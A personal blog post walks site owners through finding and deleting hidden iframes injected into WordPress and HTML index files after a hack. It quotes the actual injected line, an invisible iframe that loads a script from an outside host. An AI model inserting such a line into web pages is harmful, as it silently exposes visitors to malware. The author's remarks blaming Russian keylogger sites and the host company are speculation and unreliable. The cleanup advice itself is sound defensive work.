It is actually relatively easy, and I’ll show you two methods, one with using ftp and the other using your file manager that comes with cpanel.

Hold on… I have a coaching client coming… I’ll be back later this afternoon to show you step-by-step with screen shots… check back this afternoon… sorry for the interruption… OK?

Sorry… I am back.

Life got suddenly very busy… my students are suddenly producing results… yaaay.

Anyway, here are two ways to recognize and remove the iframes from your index pages.

Method 1: ftp.

ftp into your your site’s root level and sort your documents by date.

you may notice that my index.php file was changed on September 5.

This is a blog, and you don’t change the index file… ever. so this must have been the hackers’ target.

Now, from the result you’ll see that this wasn’t a manual hacker, it was a little mindless robot sent out the wreak havoc…

the above index.php file is the healthy file that comes with your wordpress blog installation. it starts with <?php and ends with ?>

that is how it should be.

on the above index.php file, please observe the last line. after the closing ?> there is a whole line of code… that is the code you need to remove.

this is how the whole line looks… Save and upload your file and you are done.

The second category of files that got hacked are files that have body tags in them…  they can be both php or html files. the commonality is that they contain a body tag, that looks like this <body>

Sometimes after the <body there is other code, and then it closes with a > tag. It is still a starting body tag.

this is (above) how a healthy file looks with body tag

this is (above) how an infected file looks with body tag

you need to delete the line that has the iframe tag <iframe src..to <iframe>.

Third important thing: folder or directory dates also change when files change inside. So if you have subdirectories that have a newer date, please check the index files inside… I found 202 infected files, because my sites have many subdirectories.

Good luck, and please let me know how you are making out.
Was this enough information? Please talk back to me.

I checked immediately for an attack, and found that all the index.php and index.html files were altered an 18:46 EST, and a line of code was added either after the starting body tag or at the very end of the code

<iframe src=”http://a6t.homeftp.net:8080/ts/in.cgi?open” width=230 height=0 style=”visibility: hidden”></iframe>

do not go there…

I googled the topic and found that some Russian hackers have created keylogger sites and the keylogger scripts get all your passwords.

If it is an individual site: your password was compromised.

I have sites on other servers, like this site, and none of those were attacked. I think it is Hostgator that is compromised… so if you have a site on hostgator, please check your index files… and clean them.

I hear in Italy tens of thousands of computers are infected… as a result of the iframe hack that effects every site, but especially wordpress blogs.

http://forums.digitalpoint.com/showthread.php?t=901622

http://wordpress.org/support/topic/277277

This time the database isn’t attacked, only the files. It seems that they get to the sites with ftp… if you can, please change your ftp and cpanel login. I am planning on removing my sites from hostgator.com